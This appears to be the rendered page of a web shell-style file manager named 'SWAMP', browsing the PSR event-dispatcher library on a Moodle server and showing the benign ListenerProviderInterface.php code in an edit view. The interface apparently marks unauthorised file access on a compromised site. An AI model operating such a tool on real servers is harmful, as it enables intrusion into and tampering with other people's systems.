░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/moodle/public/lib/psr/event-dispatcher/src
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: ListenerProviderInterface.php
<?php declare(strict_types=1); namespace Psr\EventDispatcher; /** * Mapper from an event to the listeners that are applicable to that event. */ interface ListenerProviderInterface { /** * @param object $event * An event for which to return the relevant listeners. * @return iterable<callable> * An iterable (array, iterator, or generator) of callables. Each * callable MUST be type-compatible with $event. */ public function getListenersForEvent(object $event) : iterable; }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 EventDispatcherInterface.php
PHP
431 B
2026-02-11 01:44
EDIT
📄 ListenerProviderInterface.php
PHP
524 B
2026-02-11 01:44
EDIT
📄 StoppableEventInterface.php
PHP
785 B
2026-02-11 01:44
EDIT